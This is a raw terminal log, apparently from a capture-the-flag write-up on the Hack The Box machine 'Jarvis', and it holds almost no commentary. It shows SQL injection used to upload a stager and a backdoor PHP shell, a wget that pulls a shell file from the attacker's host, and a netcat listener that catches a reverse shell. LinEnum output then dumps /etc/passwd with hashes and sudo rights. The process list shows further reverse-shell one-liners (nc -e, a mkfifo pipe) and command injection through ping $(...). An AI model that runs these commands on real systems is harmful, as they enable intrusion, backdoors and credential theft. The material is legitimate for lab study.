[05:21:18] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) (‘/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs’) (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[05:21:18] [INFO] retrieved web server absolute paths: ‘/images/’
[05:21:18] [INFO] trying to upload the file stager on ‘/var/www/’ via LIMIT ‘LINES TERMINATED BY’ method
[05:21:19] [WARNING] unable to upload the file stager on ‘/var/www/’
[05:21:19] [INFO] trying to upload the file stager on ‘/var/www/’ via UNION method
[05:21:19] [WARNING] expect junk characters inside the file as a leftover from UNION query
[05:21:20] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[05:21:21] [INFO] trying to upload the file stager on ‘/var/www/html/’ via LIMIT ‘LINES TERMINATED BY’ method
[05:21:22] [INFO] the file stager has been successfully uploaded on ‘/var/www/html/’ – http://10.10.10.143:80/tmpuwsaq.php
[05:21:23] [INFO] the backdoor has been successfully uploaded on ‘/var/www/html/’ – http://10.10.10.143:80/tmpbstqd.php
[05:21:23] [INFO] calling OS shell. To quit type ‘x’ or ‘q’ and press ENTER
os-shell>

os-shell> wget 10.10.15.149/shell2.php
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output:

–2019-11-10 00:29:32– http://10.10.15.149/shell2.php
Connecting to 10.10.15.149:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 5490 (5.4K) [application/octet-stream]
Saving to: ‘shell2.php’

0K ….. 100% 579M=0s

2019-11-10 00:29:33 (579 MB/s) – ‘shell2.php’ saved [5490/5490]

on another terminal

root@kali:~/Downloads# nc -lvnp 8888
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888

now on browser

http://jarvis.htb/shell3.php

we get the shell

root@kali:~/Downloads# nc -lvnp 8888
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 10.10.10.143.
Ncat: Connection from 10.10.10.143:35918.
Linux jarvis 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
00:38:12 up 5:54, 0 users, load average: 0.01, 0.04, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$

$ python -c ‘import pty; pty.spawn(“/bin/bash”)’
www-data@jarvis:/$

www-data@jarvis:/$ ls
ls
bin home lib32 mnt run tmp vmlinuz.old
boot initrd.img lib64 opt sbin usr
dev initrd.img.old lost+found proc srv var
etc lib media root sys vmlinuz

www-data@jarvis:/$ cd /var/www/html
cd /var/www/html
www-data@jarvis:/var/www/html$ ls
ls
LinEnum.sh livin.php shell.php tmpueihb.php
ayax nav.php shell2.php tmpugxsc.php
b4nn3d pearly1.php shell2.php.1 tmpupqpe.php
connection.php php-reverse-shell.php shell3.php tmpuqweo.php
css phpmyadmin shellme.html tmpurlvi.php
dining-bar.php room.php shellme.sh tmpusyia.php
fonts roomobj.php tmpbceag.php tmpuujwn.php
footer.php rooms-suites.php tmpbstqd.php tmpuumez.php
getfileayax.php s.php tmpbujgl.php tmpuvpbk.php
gg.php santa.php tmpbviua.php tmpuwsaq.php
gg1.php sass tmpbxjzt.php vanathi.php
images sh3ll.php tmpbyehx.php
index.php sh3ll1.php tmpbzfws.php
js sh3ll2.php tmpubygk.php

www-data@jarvis:/var/www/html$ chmod +x LinEnum.sh
chmod +x LinEnum.sh
www-data@jarvis:/var/www/html$ ./LinEnum.sh
./LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.98

[-] Debug Info
[+] Thorough tests = Disabled

Scan started at:
Sun Nov 10 00:41:06 EST 2019

### SYSTEM ##############################################
[-] Kernel information:
Linux jarvis 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 4.9.0-8-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.144-3.1 (2019-02-19)

[-] Specific release information:
PRETTY_NAME=”Debian GNU/Linux 9 (stretch)”
NAME=”Debian GNU/Linux”
VERSION_ID=”9″
VERSION=”9 (stretch)”
ID=debian
HOME_URL=”https://www.debian.org/”
SUPPORT_URL=”https://www.debian.org/support”
BUG_REPORT_URL=”https://bugs.debian.org/”

[-] Hostname:
jarvis

### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[-] Users that have previously logged onto the system:
Username Port From Latest
root tty1 Wed Aug 7 08:13:17 -0400 2019
pepper pts/0 172.16.204.1 Tue Mar 5 10:23:48 -0500 2019
oscp987 tty1 Wed Aug 7 08:13:17 -0400 2019
oscp876 tty1 Wed Aug 7 08:13:17 -0400 2019

[-] Who else is logged on:
00:41:06 up 5:57, 0 users, load average: 0.03, 0.04, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)
uid=106(mysql) gid=112(mysql) groups=112(mysql)
uid=107(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)

[+] It looks like we have password hashes in /etc/passwd!
oscp987://ylENbU061xPB.UxzDd0:0:0:/root:/bin/bash
oscp876:$1$oscp876$j//ylENbU061xPB.UxzDd0:0:0:/root:/bin/bash

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
pepper:x:1000:1000:,,,:/home/pepper:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
oscp987://ylENbU061xPB.UxzDd0:0:0:/root:/bin/bash
oscp876:$1$oscp876$j//ylENbU061xPB.UxzDd0:0:0:/root:/bin/bash

[-] Super user account(s):
root
oscp987
oscp876

[+] We can sudo without supplying a password!
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K Mar 2 2019 .
drwxr-xr-x 23 root root 4.0K Mar 3 2019 ..
drwxr-xr-x 4 pepper pepper 4.0K Nov 10 00:37 pepper

### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_LOG_DIR=/var/log/apache2
LANG=C
OLDPWD=/
INVOCATION_ID=3373a0757ac942419c7eb85dc3cc1caa
APACHE_LOCK_DIR=/var/lock/apache2
PWD=/var/www/html
JOURNAL_STREAM=8:12893
APACHE_RUN_GROUP=www-data
APACHE_RUN_DIR=/var/run/apache2
APACHE_RUN_USER=www-data
APACHE_PID_FILE=/var/run/apache2/apache2.pid
SHLVL=2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
_=/usr/bin/env

[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash

[-] Current umask value:
0000
u=rwx,g=rwx,o=rwx

[-] umask value as specified in /etc/login.defs:
UMASK 022

[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512

### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r–r– 1 root root 722 Oct 7 2017 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Mar 2 2019 .
drwxr-xr-x 80 root root 4096 Aug 7 08:14 ..
-rw-r–r– 1 root root 102 Oct 7 2017 .placeholder
-rw-r–r– 1 root root 712 Jan 1 2017 php

/etc/cron.daily:
total 44
drwxr-xr-x 2 root root 4096 Mar 4 2019 .
drwxr-xr-x 80 root root 4096 Aug 7 08:14 ..
-rw-r–r– 1 root root 102 Oct 7 2017 .placeholder
-rwxr-xr-x 1 root root 539 Nov 3 2018 apache2
-rwxr-xr-x 1 root root 1474 Jan 18 2019 apt-compat
-rwxr-xr-x 1 root root 355 Oct 25 2016 bsdmainutils
-rwxr-xr-x 1 root root 1597 Jun 25 2018 dpkg
-rwxr-xr-x 1 root root 2211 Apr 13 2014 locate
-rwxr-xr-x 1 root root 89 May 5 2015 logrotate
-rwxr-xr-x 1 root root 1065 Dec 13 2016 man-db
-rwxr-xr-x 1 root root 249 May 17 2017 passwd

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Mar 2 2019 .
drwxr-xr-x 80 root root 4096 Aug 7 08:14 ..
-rw-r–r– 1 root root 102 Oct 7 2017 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Mar 2 2019 .
drwxr-xr-x 80 root root 4096 Aug 7 08:14 ..
-rw-r–r– 1 root root 102 Oct 7 2017 .placeholder

/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Mar 2 2019 .
drwxr-xr-x 80 root root 4096 Aug 7 08:14 ..
-rw-r–r– 1 root root 102 Oct 7 2017 .placeholder
-rwxr-xr-x 1 root root 723 Dec 13 2016 man-db

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don’t have to run the `crontab’
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts –report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts –report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts –report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts –report /etc/cron.monthly )
#

### NETWORKING ##########################################
[-] Network and IP info:
1: lo: <loopback,up,lower_up> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <broadcast,multicast,up,lower_up> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:50:56:bd:52:e1 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.143/24 brd 10.10.10.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:febd:52e1/64 scope global mngtmpaddr dynamic
valid_lft 86247sec preferred_lft 14247sec
inet6 fe80::250:56ff:febd:52e1/64 scope link
valid_lft forever preferred_lft forever</broadcast,multicast,up,lower_up></loopback,up,lower_up>

[-] ARP history:
10.10.10.2 dev ens33 lladdr 00:50:56:bd:e2:c6 REACHABLE
fe80::250:56ff:febd:e2c6 dev ens33 lladdr 00:50:56:bd:e2:c6 router STALE

[-] Nameserver(s):
nameserver 1.1.1.1

[-] Nameserver(s):
Global
DNS Servers: 1.1.1.1
DNS Domain: localdomain
DNSSEC NTA: 10.in-addr.arpa
16.172.in-addr.arpa
168.192.in-addr.arpa
17.172.in-addr.arpa
18.172.in-addr.arpa
19.172.in-addr.arpa
20.172.in-addr.arpa
21.172.in-addr.arpa
22.172.in-addr.arpa
23.172.in-addr.arpa
24.172.in-addr.arpa
25.172.in-addr.arpa
26.172.in-addr.arpa
27.172.in-addr.arpa
28.172.in-addr.arpa
29.172.in-addr.arpa
30.172.in-addr.arpa
31.172.in-addr.arpa
corp
d.f.ip6.arpa
home
internal
intranet
lan
local
private
test

Link 2 (ens33)
Current Scopes: LLMNR/IPv4 LLMNR/IPv6
LLMNR setting: yes
MulticastDNS setting: no
DNSSEC setting: no
DNSSEC supported: no

[-] Default route:
default via 10.10.10.2 dev ens33 onlink

[-] Listening TCP:
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 80 127.0.0.1:3306 *:*
LISTEN 0 128 *:5355 *:*
LISTEN 0 128 *:22 *:*
LISTEN 0 128 :::64999 :::*
LISTEN 0 128 :::5355 :::*
LISTEN 0 128 :::80 :::*
LISTEN 0 128 :::22 :::*

[-] Listening UDP:
State Recv-Q Send-Q Local Address:Port Peer Address:Port
UNCONN 0 0 127.0.0.53%lo:53 *:*
UNCONN 0 0 *:5355 *:*
UNCONN 0 0 :::5355 :::*

### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.6 139000 6856 ? Ss Nov09 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S Nov09 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S Nov09 0:04 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< Nov09 0:00 [kworker/0:0H] root 7 0.0 0.0 0 0 ? S Nov09 0:01 [rcu_sched] root 8 0.0 0.0 0 0 ? S Nov09 0:00 [rcu_bh] root 9 0.0 0.0 0 0 ? S Nov09 0:00 [migration/0] root 10 0.0 0.0 0 0 ? S< Nov09 0:00 [lru-add-drain] root 11 0.0 0.0 0 0 ? S Nov09 0:00 [watchdog/0] root 12 0.0 0.0 0 0 ? S Nov09 0:00 [cpuhp/0] root 13 0.0 0.0 0 0 ? S Nov09 0:00 [kdevtmpfs] root 14 0.0 0.0 0 0 ? S< Nov09 0:00 [netns] root 15 0.0 0.0 0 0 ? S Nov09 0:00 [khungtaskd] root 16 0.0 0.0 0 0 ? S Nov09 0:00 [oom_reaper] root 17 0.0 0.0 0 0 ? S< Nov09 0:00 [writeback] root 18 0.0 0.0 0 0 ? S Nov09 0:00 [kcompactd0] root 19 0.0 0.0 0 0 ? SN Nov09 0:00 [ksmd] root 21 0.0 0.0 0 0 ? SN Nov09 0:00 [khugepaged] root 22 0.0 0.0 0 0 ? S< Nov09 0:00 [crypto] root 23 0.0 0.0 0 0 ? S< Nov09 0:00 [kintegrityd] root 24 0.0 0.0 0 0 ? S< Nov09 0:00 [bioset] root 25 0.0 0.0 0 0 ? S< Nov09 0:00 [kblockd] root 26 0.0 0.0 0 0 ? S< Nov09 0:00 [devfreq_wq] root 27 0.0 0.0 0 0 ? S< Nov09 0:00 [watchdogd] root 28 0.0 0.0 0 0 ? S Nov09 0:00 [kswapd0] root 29 0.0 0.0 0 0 ? S< Nov09 0:00 [vmstat] root 41 0.0 0.0 0 0 ? S< Nov09 0:00 [kthrotld] root 42 0.0 0.0 0 0 ? S< Nov09 0:00 [ipv6_addrconf] root 85 0.0 0.0 0 0 ? S< Nov09 0:00 [ata_sff] root 86 0.0 0.0 0 0 ? S< Nov09 0:00 [mpt_poll_0] root 87 0.0 0.0 0 0 ? S< Nov09 0:00 [mpt/0] root 114 0.0 0.0 0 0 ? S Nov09 0:00 [scsi_eh_0] root 115 0.0 0.0 0 0 ? S< Nov09 0:00 [scsi_tmf_0] root 117 0.0 0.0 0 0 ? S< Nov09 0:00 [bioset] root 118 0.0 0.0 0 0 ? S Nov09 0:00 [scsi_eh_1] root 120 0.0 0.0 0 0 ? S< Nov09 0:00 [scsi_tmf_1] root 122 0.0 0.0 0 0 ? S Nov09 0:00 [scsi_eh_2] root 124 0.0 0.0 0 0 ? S< Nov09 0:00 [scsi_tmf_2] root 138 0.0 0.0 0 0 ? S< Nov09 0:00 [bioset] root 140 0.0 0.0 0 0 ? S< Nov09 0:00 [kworker/0:1H] root 165 0.0 0.0 0 0 ? S< Nov09 0:00 [kworker/u257:0] root 172 0.0 0.0 0 0 ? S Nov09 0:00 [jbd2/sda1-8] root 173 0.0 0.0 0 0 ? S< Nov09 0:00 [ext4-rsv-conver] root 195 0.0 0.4 56800 4912 ? Ss Nov09 0:00 /lib/systemd/systemd-journald root 200 0.0 1.0 207512 10544 ? Ssl Nov09 0:09 /usr/bin/vmtoolsd root 201 0.0 0.0 0 0 ? S Nov09 0:00 [kauditd] root 231 0.0 0.3 45600 3692 ? Ss Nov09 0:00 /lib/systemd/systemd-udevd root 340 0.0 0.0 0 0 ? S< Nov09 0:00 [ttm_swap] systemd+ 361 0.0 0.4 127284 4032 ? Ssl Nov09 0:01 /lib/systemd/systemd-timesyncd root 386 0.0 0.2 37980 2148 ? Ss Nov09 0:00 /lib/systemd/systemd-logind root 387 0.0 0.2 29664 2768 ? Ss Nov09 0:00 /usr/sbin/cron -f message+ 389 0.0 0.3 45116 3888 ? Ss Nov09 0:00 /usr/bin/dbus-daemon –system –address=systemd: –nofork –nopidfile –systemd-activation root 401 0.0 2.6 229376 26680 ? Ss Nov09 0:00 php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf) root 404 0.0 1.8 153488 18280 ? Ss Nov09 0:00 /usr/bin/VGAuthService root 405 0.0 0.3 250112 3176 ? Ssl Nov09 0:00 /usr/sbin/rsyslogd -n root 406 0.5 1.7 211524 17172 ? Ss Nov09 1:59 python3 /root/sqli_defender.py root 417 0.0 0.1 14524 1636 tty1 Ss+ Nov09 0:00 /sbin/agetty –noclear tty1 linux root 451 0.0 0.0 0 0 ? S< Nov09 0:00 [edac-poller] www-data 466 0.0 0.6 229376 6416 ? S Nov09 0:00 php-fpm: pool www www-data 467 0.0 0.6 229376 6416 ? S Nov09 0:00 php-fpm: pool www mysql 590 0.0 8.9 655428 89656 ? Ssl Nov09 0:07 /usr/sbin/mysqld root 603 0.0 0.6 69952 6464 ? Ss Nov09 0:00 /usr/sbin/sshd -D root 634 0.0 2.5 271396 25764 ? Ss Nov09 0:00 /usr/sbin/apache2 -k start www-data 667 0.0 2.1 273820 21720 ? S Nov09 0:00 /usr/sbin/apache2 -k start www-data 669 0.0 2.1 273888 21924 ? S Nov09 0:00 /usr/sbin/apache2 -k start www-data 814 0.0 1.7 273788 18000 ? S Nov09 0:00 /usr/sbin/apache2 -k start www-data 848 0.0 1.8 273788 18984 ? S Nov09 0:00 /usr/sbin/apache2 -k start www-data 909 0.0 0.0 4276 744 ? S Nov09 0:00 sh -c nc 10.10.15.71 1111 -e /bin/bash www-data 910 0.0 0.2 17940 2816 ? S Nov09 0:00 bash www-data 911 0.0 0.6 32176 6912 ? S Nov09 0:00 python -c import pty; pty.spawn(“/bin/sh”) www-data 912 0.0 0.0 4276 772 pts/1 Ss+ Nov09 0:00 /bin/sh www-data 918 0.0 0.0 4276 740 ? S Nov09 0:00 sh -c nc 10.10.15.71 1111 -e /bin/bash www-data 919 0.0 0.2 17940 2744 ? S Nov09 0:00 bash www-data 925 0.0 0.6 32176 6800 ? S Nov09 0:00 python -c import pty; pty.spawn(“/bin/sh”) www-data 926 0.0 0.1 4276 1428 pts/2 Ss Nov09 0:00 /bin/sh www-data 992 0.0 0.3 28976 3180 pts/2 S Nov09 0:17 vi www-data 994 0.0 0.0 4276 748 pts/2 S Nov09 0:00 sh -c bash www-data 995 0.0 0.3 18164 3240 pts/2 S Nov09 0:00 bash www-data 999 0.0 1.3 272060 13564 ? S Nov09 0:00 /usr/sbin/apache2 -k start root 1127 0.0 0.3 47608 3192 pts/2 S+ Nov09 0:00 sudo -u pepper /var/www/Admin-Utilities/simpler.py -p pepper 1128 0.0 0.9 26048 9260 pts/2 S+ Nov09 0:00 python3 /var/www/Admin-Utilities/simpler.py -p pepper 1129 0.0 0.0 4276 708 pts/2 S+ Nov09 0:00 sh -c ping $(/tmp/i.sh) pepper 1130 0.0 0.0 4276 724 pts/2 S+ Nov09 0:00 /bin/sh /tmp/i.sh pepper 1131 0.0 0.2 9484 2548 pts/2 S+ Nov09 0:00 bash pepper 1132 0.0 0.6 32176 6652 pts/2 S+ Nov09 0:00 python -c import pty; pty.spawn(“/bin/sh”) pepper 1133 0.0 0.0 4276 748 pts/0 Ss+ Nov09 0:00 /bin/sh www-data 1142 0.0 0.0 4276 760 ? S Nov09 0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.251 1234 >/tmp/f
www-data 1146 0.0 0.0 4276 696 ? S Nov09 0:00 /bin/sh -i
www-data 1148 0.0 0.6 32176 6940 ? S Nov09 0:00 python -c import pty;pty.spawn(‘/bin/bash’)
www-data 1149 0.0 0.3 18164 3312 pts/3 Ss Nov09 0:00 /bin/bash
root 1161 0.0 0.3 47608 3212 pts/3 S Nov09 0:00 sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
pepper 1162 0.0 0.9 26044 9180 pts/3 S Nov09 0:00 python3 /var/www/Admin-Utilities/simpler.py -p
pepper 1163 0.0 0.0 4276 736 pts/3 S Nov09 0:00 sh -c ping $(bash)
pepper 1164 0.0 0.4 19416 4472 pts/3 S Nov09 0:00 bash
pepper 1173 0.0 0.4 19416 4480 pts/3 S Nov09 0:00 bash -i
www-data 1223 0.0 1.3 271892 13236 ? S Nov09 0:00 /usr/sbin/apache2 -k start
www-data 1232 0.0 0.0 4276 748 ? S Nov09 0:00 sh -c nc 10.10.15.41 1111 -e /bin/bash
www-data 1233 0.0 0.2 17940 2828 ? S Nov09 0:00 bash
www-data 1236 0.0 0.6 32176 6816 ? S Nov09 0:00 python -c import pty;pty.spawn(“/bin/sh”)
www-data 1237 0.0 0.0 4276 744 pts/4 Ss Nov09 0:00 /bin/sh
www-data 1239 0.0 0.3 28976 3264 pts/4 S+ Nov09 0:00 vi
www-data 1250 0.0 1.1 271700 11404 ? S Nov09 0:00 /usr/sbin/apache2 -k start
www-data 1251 0.0 1.7 273848 17600 ? S Nov09 0:00 /usr/sbin/apache2 -k start
www-data 1366 0.0 0.0 4276 696 ? S Nov09 0:00 sh -c nc 10.10.15.41 1111 -e /bin/bash
www-data 1367 0.0 0.2 17940 2852 ? S Nov09 0:00 bash
www-data 1368 0.0 0.6 32176 6952 ? S Nov09 0:00 python -c import pty; pty.spawn(“/bin/sh”)
www-data 1369 0.0 0.0 4276 756 pts/5 Ss Nov09 0:00 /bin/sh
www-data 1370 0.0 0.3 28976 3256 pts/5 S Nov09 0:15 vi
www-data 1372 0.0 0.0 4276 760 pts/5 S Nov09 0:00 sh -c bash
www-data 1373 0.0 0.3 18168 3232 pts/5 S Nov09 0:00 bash
root 1400 0.0 0.3 47608 3240 pts/5 S+ Nov09 0:00 sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
pepper 1401 0.0 0.8 26044 8868 pts/5 S+ Nov09 0:00 python3 /var/www/Admin-Utilities/simpler.py -p
pepper 1402 0.0 0.0 4276 744 pts/5 S+ Nov09 0:00 sh -c ping $(/tmp/rev.sh)
pepper 1403 0.0 0.0 4276 712 pts/5 S+ Nov09 0:00 /bin/sh /tmp/rev.sh
pepper 1404 0.0 0.2 9484 2532 pts/5 S+ Nov09 0:00 bash
pepper 1406 0.0 0.6 32176 6964 pts/5 S+ Nov09 0:00 python -c import pty; pty.spawn(“/bin/sh”)
pepper 1407 0.0 0.0 4276 716 pts/6 Ss Nov09 0:00 /bin/sh
pepper 1408 0.0 0.3 28976 3328 pts/6 S Nov09 0:14 vi
pepper 1409 0.0 0.4 19416 4560 pts/6 S+ Nov09 0:00 bash
pepper 1416 0.0 0.6 32176 6600 pts/3 S+ Nov09 0:00 python -c import pty;pty.spawn(‘/bin/bash’)
pepper 1417 0.0 0.4 19408 4420 pts/7 Ss+ Nov09 0:00 /bin/bash
www-data 1428 0.0 0.0 4276 712 ? S Nov09 0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.251 1234 >/tmp/f
www-data 1432 0.0 0.0 4276 720 ? S Nov09 0:00 /bin/sh -i
www-data 1434 0.0 0.6 32176 6960 ? S Nov09 0:00 python -c import pty;pty.spawn(‘/bin/bash’)
www-data 1435 0.0 0.3 18164 3160 pts/8 Ss Nov09 0:00 /bin/bash
www-data 1437 0.0 0.3 18164 3224 pts/8 S Nov09 0:00 bash -i
www-data 1438 0.0 0.6 32176 6772 pts/8 S+ Nov09 0:00 python -c import pty;pty.spawn(‘/bin/bash’)
www-data 1439 0.0 0.3 18164 3308 pts/9 Ss+ Nov09 0:00 /bin/bash
www-data 1444 0.0 0.0 4276 760 ? S Nov09 0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.251 1234 >/tmp/f
www-data 1448 0.0 0.0 4276 752 ? S Nov09 0:00 /bin/sh -i
www-data 1450 0.0 0.6 32176 6980 ? S Nov09 0:00 python -c import pty;pty.spawn(‘/bin/bash’)
www-data 1451 0.0 0.3 18164 3144 pts/10 Ss Nov09 0:00 /bin/bash
root 1452 0.0 0.3 47608 3208 pts/10 S Nov09 0:00 sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
pepper 1453 0.0 0.9 26040 9156 pts/10 S Nov09 0:00 python3 /var/www/Admin-Utilities/simpler.py -p
pepper 1454 0.0 0.0 4276 792 pts/10 S Nov09 0:00 sh -c ping $(bash)
pepper 1455 0.0 0.4 19416 4432 pts/10 S Nov09 0:00 bash
pepper 1461 0.0 0.4 19416 4412 pts/10 S Nov09 0:00 bash -i
pepper 1467 0.0 0.6 32176 6788 pts/10 S+ Nov09 0:00 python -c import pty;pty.spawn(‘/bin/bash’)
pepper 1468 0.0 0.4 19416 4460 pts/11 Ss+ Nov09 0:00 /bin/bash
www-data 1484 0.0 0.0 4276 772 ? S Nov09 0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.251 1234 >/tmp/f
www-data 1488 0.0 0.0 4276 712 ? S Nov09 0:00 /bin/sh -i
www-data 1490 0.0 0.6 32176 6912 ? S Nov09 0:00 python -c import pty;pty.spawn(‘/bin/bash’)
www-data 1491 0.0 0.3 18164 3228 pts/12 Ss Nov09 0:00 /bin/bash
root 1492 0.0 0.3 47608 3220 pts/12 S Nov09 0:00 sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
pepper [-] Apache version:
Server version: Apache/2.4.25 (Debian)
Server built: 2018-11-03T18:46:19

[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data

[-] Installed Apache modules:
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
